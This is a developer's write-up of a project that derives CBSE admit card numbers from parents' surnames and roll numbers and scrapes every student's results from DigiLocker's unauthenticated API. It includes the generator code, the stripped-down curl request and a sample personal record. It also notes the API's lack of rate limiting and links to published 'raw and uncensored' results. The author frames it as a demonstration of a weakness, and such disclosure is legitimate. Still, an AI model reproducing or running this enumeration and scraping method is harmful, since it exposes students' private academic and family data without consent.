CBSE Wrapped

Background

On the day of results, I found this (since deleted) post on reddit which explained the algorithm behind how Admit Card Numbers are generated, since the algorithm was pretty trivial, I created a simple site to generate them provided some basic information about the student (and also that it gave me a reason to learn Vue, but whatever).

What basic information you may ask ?? Well, it only takes

Father's Name
Mothers's Name
Student's Rollnumber
School Number
and Center Number

to generate the admit card number and thereby view the results of any student.

Generating the Admit Card Numbers

The admit card is composed of 8 characters.

The first character is the 2^nd last letter of Father's Full Name.
The second character is the last letter of Mother's Full Name.
The third and fourth characters are the last 2 digits of the roll number.
The next two characters are the first 2 digits of the school number.
The last two characters are the middle 2 digits of the centre number.

export function generate(
    fathersName: string,
    mothersName: string,
    studentRollNumber: string,
    schoolNumber: string,
    centerNumber: string,
) {
    const F = fathersName.at(-2);
    const M = mothersName.at(-1);
    const RR = studentRollNumber.slice(-2);
    const SS = schoolNumber.slice(0, 2);

    const half = centerNumber.length / 2 - 1;
    const CC = centerNumber.slice(half, half + 2);

    return ((F as string) + (M as string) + RR + SS + CC).toUpperCase();
}

If the student was from my school (which they are), I would already have the school number and centre number. Getting their rollnumbers was also trivial since they are just sequential. The sole challenge was getting hand the name of parents, but if you notice carefully, the "last n letter of parent's name" was to be extracted from a union of name and surname both.

This meant that in theory I could use just the student's full name, or infact just the surname in order to bypass this restriction, which I did, and it worked for the 90% of students, for whom, both the parents had the same surname as the student itself.

Scraping the results

Then I realised that if I can view the results of any student I could potentially view the results of all the students. And what is the easist way to view all the results ?? To Scrape them !!

So I started poking around in the Network Panel of Devtools on the digilocker's result website to see how the result is requested from the backend.

curl 'https://results.digilocker.gov.in/api/cbse/hscer/results' \
  -H 'accept: */*' \
  -H 'accept-language: en-US,en;q=0.6' \
  -H 'cache-control: no-cache' \
  -H 'content-type: application/x-www-form-urlencoded; charset=UTF-8' \
  -b 'Path=/' \
  -H 'origin: https://results.digilocker.gov.in' \
  -H 'pragma: no-cache' \
  -H 'priority: u=1, i' \
  -H 'referer: https://results.digilocker.gov.in/CBSE12th2026resultXIInruew.html' \
  -H 'sec-ch-ua: "Chromium";v="148", "Brave";v="148", "Not/A)Brand";v="99"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "Linux"' \
  -H 'sec-fetch-dest: empty' \
  -H 'sec-fetch-mode: cors' \
  -H 'sec-fetch-site: same-origin' \
  -H 'sec-gpc: 1' \
  -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36' \
  -H 'x-requested-with: XMLHttpRequest' \
  --data-raw 'rroll=15623245&year=2026&admn_id=MA453022'

on stripping down to bare essentials

curl 'https://results.digilocker.gov.in/api/cbse/hscer/results' \
  -H 'content-type: application/x-www-form-urlencoded' \
  --data-raw 'rroll=15623245&year=2026&admn_id=MA453022'

and what can we notice here ?? An absence of any auth headers or cookies (well obviously since the rollnumbers and admit card numbers act as auth info, but again whatever).

Taking the advantage of this very primitive API request model, I wrote a simple script which scrapes the result of all school students when fed in with student name and rollnumbers, and combines it down into a single response JSON.

Fetching results for some students failed because of the difference in parent's surnames and they were thereby discarded.

Cleaning and Compiling the Results

The Digilocker's API returns result as a raw JSON object which is then rendered on their website. But this JSON was pretty vague to do any meaningful analysis on, so I fed it through a data cleaning pipeline which complied down the results into much more semantic structure.

You can find annotations for every field of the response here.

So something like this,

{
    "data": {
        "ADMN_ID": "MA453022",
        "CNAME": "DIVIJ VERMA",
        "FNAME": "SHIVENDER VERMA",
        "MNAME": "PRIYANKA VERMA",
        "SEX": "M",
        "CLASS": "XII",
        "SESSION": "2025-2026",
        "MONTH": "MAY",
        "MONTH_L": "",
        "DOD": "13/05/2026",
        "YEAR": "2026",
        "ORGID": "CBSE",
        "CENT": "822285",
        "SCH": "30058",
        "SCH_NAME": "D A V PUBLIC SCHOOL AUNDH PUNE MAHARASHTRA",
        "REG": "E",
        "PUBLISHED": "Y",
        "VERSION": "1",
        "MODIFIED_ON": "2026-05-13T12:09:28.252959Z",
        "RROLL": "15623245",
        "RROLL_YEAR": "15623245_2026",
        "URI": "in.gov.cbse-HSCER-156232452026",
        "SK": "30058#Y#15623245",
        "GSI_PK": "2026#E",
        "GSI_SK": "30058#Y#15623245",
        "RES": "PASS",
        "RESULT": "PASS",
        "COMPTT": "",
        "TMRK": "408",
        "CAT": "",
        "IS_NCHMCT": "N",
        "NCHMCT_1": "",
        "NCHMCT_2": "",
        "IS_NSE": "N",
        "NSE_1": "",
        "NSE_2": "",
        "IS_SKILL": "N",
        "SKILL_1": "",
        "SKILL_2": "",
        "SNAME1": "ENGLISH CORE",
        "SUB1": "301",
        "SNAME2": "MATHEMATICS",
        "SUB2": "041",
        "SNAME3": "PHYSICS",
        "SUB3": "042",
        "SNAME4": "CHEMISTRY",
        "SUB4": "043",
        "SNAME5": "INFORMATICS PRACTICE",
        "SUB5": "065",
        "SNAME6": "",
        "SUB6": "",
        "PF1": "P",
        "PF2": "P",
        "PF3": "P",
        "PF4": "P",
        "PF5": "P",
        "PF6": "",
        "GR1": "C1",
        "GR2": "A2",
        "GR3": "A1",
        "GR4": "B1",
        "GR5": "A2",
        "GR6": "",
        "MRK11": "055",
        "MRK12": "019",
        "MRK13": "074",
        "MRK13_WRDS": "SEVENTY FOUR",
        "MRK21": "061",
        "MRK22": "020",
        "MRK23": "081",
        "MRK23_WRDS": "EIGHTY ONE",
        "MRK31": "053",
        "MRK32": "029",
        "MRK33": "082",
        "MRK33_WRDS": "EIGHTY TWO",
        "MRK41": "050",
        "MRK42": "027",
        "MRK43": "077",
        "MRK43_WRDS": "SEVENTY SEVEN",
        "MRK51": "064",
        "MRK52": "030",
        "MRK53": "094",
        "MRK53_WRDS": "NINETY FOUR",
        "MRK61": "",
        "MRK62": "",
        "MRK63": "",
        "MRK63_WRDS": "",
        "ISNAME1": "WORK EXPERIENCE",
        "ISNAME2": "HEALTH & PHYSICAL EDUCATION",
        "ISNAME3": "GENERAL STUDIES",
        "ISUB1": "500",
        "ISUB2": "502",
        "ISUB3": "503",
        "IGR1": "A1",
        "IGR2": "A1",
        "IGR3": "A1"
    },
    "duration_sec": 0.021338,
    "request_id": "1182ed64-cb23-4ea8-8465-f95212775acf",
    "status": 200
}

got compiled into:

{
    "roll_number": 15623245,
    "name_candidate": "DIVIJ VERMA",
    "name_father": "SHIVENDER VERMA",
    "name_mother": "PRIYANKA VERMA",
    "sex": "M",
    "catagory": false,
    "candidate_type": "regular",
    "stream_id": "4ab90d1e-b4d6-4066-9663-fa43fa76de3c",
    "total_primary_subjects": 5,
    "primary_subjects": {
        "sub_1": {
            "subject_id": "301",
            "passed": true,
            "grade": "C1",
            "marks_theory": 55,
            "marks_practicals": 19,
            "marks_total": 74,
            "marks_total_words": "SEVENTY FOUR",
            "percentage": 74.0,
            "percentile_all_streams": 6.551724137931035,
            "rank_same_stream": 49,
            "rank_all_streams": 135
        },
        "sub_2": {
            "subject_id": "041",
            "passed": true,
            "grade": "A2",
            "marks_theory": 61,
            "marks_practicals": 20,
            "marks_total": 81,
            "marks_total_words": "EIGHTY ONE",
            "percentage": 81.0,
            "percentile_all_streams": 53.09278350515464,
            "rank_same_stream": 26,
            "rank_all_streams": 44
        },
        "sub_3": {
            "subject_id": "042",
            "passed": true,
            "grade": "A1",
            "marks_theory": 53,
            "marks_practicals": 29,
            "marks_total": 82,
            "marks_total_words": "EIGHTY TWO",
            "percentage": 82.0,
            "percentile_all_streams": 59.009009009009006,
            "rank_same_stream": 23,
            "rank_all_streams": 44
        },
        "sub_4": {
            "subject_id": "043",
            "passed": true,
            "grade": "B1",
            "marks_theory": 50,
            "marks_practicals": 27,
            "marks_total": 77,
            "marks_total_words": "SEVENTY SEVEN",
            "percentage": 77.0,
            "percentile_all_streams": 47.2972972972973,
            "rank_same_stream": 28,
            "rank_all_streams": 58
        },
        "sub_5": {
            "subject_id": "065",
            "passed": true,
            "grade": "A2",
            "marks_theory": 64,
            "marks_practicals": 30,
            "marks_total": 94,
            "marks_total_words": "NINETY FOUR",
            "percentage": 94.0,
            "percentile_all_streams": 49.056603773584904,
            "rank_same_stream": 26,
            "rank_all_streams": 26
        },
        "sub_6": null
    },
    "secondary_subjects": [
        { "subject_id": "500", "grade": "A1" },
        { "subject_id": "502", "grade": "A1" },
        { "subject_id": "503", "grade": "A1" }
    ],
    "cleared_all_subjects": true,
    "result_status": "pass",
    "compartment_subject_codes": "",
    "total_marks": 408,
    "percentage": 81.6,
    "percentile_same_stream": 47.16981132075472,
    "percentile_all_streams": 45.17241379310345,
    "rank_same_stream": 28,
    "rank_all_streams": 79
}

I further extracted out common subject groups to form streams and then extrapolated streams for each student. Then I calculated subject wise and the aggregate percentage, to rank the students by stream and across the whole school.

You can see a compiled result here.

The Architecture ^{(the fun section)}

The whole project is a polyglot ^{(a fancy way saying I used multiple languages)} monorepo with the following packages

scraper: Typescript based result scraper
result-compiler: Python based result cleaner and compiling pipeline
app: A SvelteKit based frontend
orchestrator: Scripts to coordinate between the different
data: A centralized package to store all the intermediate and processed data

Scraper

Written in Typescript and runs in the Bun runtime, contains simple but extensible scraping functions.

Currently I only use the student's name and rollnumber (along with school's common info) to scrape the results, but it can be easily extended to consume parent's information,if anyone fancies that.

All JSON which goes in and out from here gets validated using valibot schemas.

This package only exports the functions required to do the scraping, but the actual scraping and saving part is done within the orchestrator package.

Result Compiler

Core pipeline written in Python and analysis done using Pandas, it is responsible for all cleaning and data transformations, and is easily extensible to add new analysis parameters.

I decided on doing most of computations and analysis once, during build time, using the frontend as a mere view layer for the results.

All transformation, validation and serialization of data in this step is controlled via Pydantic Models.

This package again exposes a CLI which is used by the orchestrator package to compile the scraped results.

App

A SvelteKit based app which consumes the generated results. Prerenders all routes on build time and is hosted on github pages.

Orchestrator

The final piece which coordinates between all other packages.

The section with Disclaimer

The student names used in this project are fictitious and have been used for illustrative purposes only. Any resemblance to the names or results of actual students, past or present, is entirely coincidental.

This project is only made for educational purposes. And to demonstrate the fact that in a hypothetical senario, if I was able to extract the results, then anyone could easily brute force* their way into scraping all the results.

*(another thing that I noticed was that digilocker's API doesnt seem to have any kind of rate limiting. Although I only ran 10 requests in parallel at once, but doing more should be possible without any issues.)

Each and every line of this project is handwritten, and LLMs were only used in OCR extraction data from photos of student records.

Thank you for reading till end ❤️.
See the Raw and Uncensored results.